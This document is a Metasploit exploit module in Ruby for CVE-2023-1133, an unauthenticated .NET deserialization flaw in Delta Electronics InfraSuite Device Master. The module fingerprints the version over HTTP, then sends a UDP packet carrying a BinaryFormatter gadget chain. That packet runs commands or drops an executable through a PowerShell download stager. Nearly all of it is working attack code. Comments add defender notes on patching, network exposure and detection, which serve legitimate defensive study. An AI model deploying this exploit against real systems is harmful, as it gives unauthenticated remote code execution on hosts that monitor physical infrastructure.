# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

# Exploit module for CVE-2023-1133: unauthenticated .NET BinaryFormatter
# deserialization in the 'Device-Gateway-Status' process of Delta Electronics
# InfraSuite Device Master, versions below 1.0.5 (per the Description below).
#
# Transport: a single UDP datagram to RPORT (default 10100) carrying a
# BinaryFormatter payload; no authentication is involved. #check only issues
# HTTP GETs to INFRASUITE_PORT (default 80) and never touches the UDP path.
#
# Defender notes, derived from what this module does:
# - #check treats 1.0.5 and later as not vulnerable, so upgrading past that
#   version is the remediation this module recognises.
# - Limiting network reachability of the UDP listener to trusted hosts reduces
#   exposure of the unauthenticated deserialization path.
# - The wire framing in #execute_command (0x01, big-endian uint16 length,
#   serialized payload) is a concrete shape for a network detection; the
#   'Notes' metadata also declares ARTIFACTS_ON_DISK, IOC_IN_LOGS and
#   SCREEN_EFFECTS on successful use.
class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Udp
  # AutoCheck runs #check before #exploit and, by default, only proceeds when
  # the target appears vulnerable, so the HTTP fingerprint gates the UDP send.
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata and options.
  #
  # @param info [Hash] framework-supplied module info, merged via update_info
  #
  # Options registered here:
  # - RPORT (default 10100): UDP port the datagram is sent to; the Description
  #   attributes parsing of that packet to the 'Device-Gateway-Status' process.
  # - INFRASUITE_PORT (default 80): HTTP port used only by #check.
  # - TARGETURI (default '/'): base path of the web UI, used only by #check.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Delta Electronics InfraSuite Device Master Deserialization',
        'Description' => %q{
          Delta Electronics InfraSuite Device Master versions below v1.0.5 have an
          unauthenticated .NET deserialization vulnerability within the 'ParseUDPPacket()'
          method of the 'Device-Gateway-Status' process.

          The 'ParseUDPPacket()' method reads user-controlled packet data and eventually
          calls 'BinaryFormatter.Deserialize()' on what it determines to be the packet header without appropriate validation,
          leading to unauthenticated code execution as the user running the 'Device-Gateway-Status' process.
        },
        'Author' => [
          'Anonymous', # Vulnerability discovery
          'Shelby Pace' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2023-1133'],
          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-672/'],
          ['URL', 'https://attackerkb.com/topics/owl4Xz8fKW/cve-2023-1133']
        ],
        'Platform' => 'win',
        'Privileged' => false,
        'Targets' => [
          [
            'Windows EXE Dropper',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :windows_dropper,
              'CmdStagerFlavor' => :psh_invokewebrequest
            }
          ],
          [
            'Windows CMD',
            {
              'Arch' => [ARCH_CMD],
              'Type' => :windows_cmd
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2023-05-17',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )

    register_options([
      Opt::RPORT(10100),
      OptInt.new('INFRASUITE_PORT', [ true, 'The port on which the InfraSuite Manager is listening', 80 ]),
      OptString.new('TARGETURI', [ true, 'The base path to the InfraSuite Manager', '/' ])
    ])
  end

  # Fingerprints the target over HTTP without exercising the vulnerable UDP path.
  #
  # 1. GET <TARGETURI>/login.html — body must contain 'InfraSuite Manager Login'.
  # 2. GET <TARGETURI>/js/webcfg.js — body must contain 'var devicemasterCfg';
  #    the version is read from a version:'X.Y[.Z][letter]' literal in it.
  #
  # @return [CheckCode] Unknown when the first request gets no response; Safe
  #   when the login page does not match or the parsed version is >= 1.0.5;
  #   Detected when the product is recognised but no version could be parsed;
  #   Appears when the parsed version is below 1.0.5.
  def check
    print_status('Requesting the login page to determine if target is InfraSuite Device Master...')
    res = send_request_cgi(
      'method' => 'GET',
      'rport' => datastore['INFRASUITE_PORT'],
      'uri' => normalize_uri(target_uri.path, 'login.html')
    )

    # No response at all: cannot tell whether the web UI is there.
    return CheckCode::Unknown unless res

    unless res.body.include?('InfraSuite Manager Login')
      return CheckCode::Safe('Target does not appear to be InfraSuite Device Master.')
    end

    print_status('Target is InfraSuite Device Master. Now attempting to determine version.')
    res = send_request_cgi(
      'method' => 'GET',
      'rport' => datastore['INFRASUITE_PORT'],
      'uri' => normalize_uri(target_uri.path, 'js/webcfg.js')
    )

    # Safe navigation: this second request may also return nil.
    unless res&.body&.include?('var devicemasterCfg')
      return CheckCode::Detected('Discovered InfraSuite Device Master, but couldn\'t determine version.')
    end

    version = res.body.match(/version:'(\d+(?:\.\d+)+[a-zA-Z]?)'/)
    # MatchData#length counts the whole match plus capture groups, so > 1 means
    # the version group was captured.
    unless version && version.length > 1
      return CheckCode::Detected('Failed to find version string')
    end

    version = version[1]
    vprint_status("Found version '#{version}' of InfraSuite Device Master")
    r_vers = Rex::Version.new(version)

    # 1.0.5 is the first version this module considers fixed.
    return CheckCode::Appears if r_vers < Rex::Version.new('1.0.5')

    CheckCode::Safe
  end

  # Opens the UDP socket to RPORT, then delivers the payload according to the
  # selected target: the dropper target goes through the CmdStager mixin, which
  # is expected to call #execute_command; the CMD target sends the encoded
  # command payload directly.
  def exploit
    connect_udp
    case target['Type']
    when :windows_dropper
      execute_cmdstager
    when :windows_cmd
      execute_command(payload.encoded)
    end
  end

  # Builds the serialized .NET gadget (ClaimsPrincipal chain, BinaryFormatter
  # format) that runs +cmd+ when deserialized, frames it, and sends it as one
  # UDP datagram on the socket opened by #exploit.
  #
  # Wire format, as a network sensor would observe it: 0x01, then the payload
  # length as an unsigned 16-bit big-endian integer, then the payload bytes.
  #
  # @param cmd [String] command to execute on the target
  # @param _opts [Hash] unused; present for the CmdStager callback signature
  def execute_command(cmd, _opts = {})
    serialized = ::Msf::Util::DotNetDeserialization.generate(
      cmd,
      gadget_chain: :ClaimsPrincipal,
      formatter: :BinaryFormatter
    )

    # 'n' is a 16-bit field, so a payload over 65535 bytes would not be framed
    # correctly. NOTE(review): String#length counts characters, not bytes —
    # this assumes the generator returns a binary-encoded string; confirm.
    pkt = "\x01#{[ serialized.length ].pack('n')}#{serialized}"
    udp_sock.put(pkt)
  end

  # Closes the UDP socket opened in #exploit.
  # NOTE(review): does not call super; confirm no mixin cleanup is skipped.
  def cleanup
    disconnect_udp
  end
end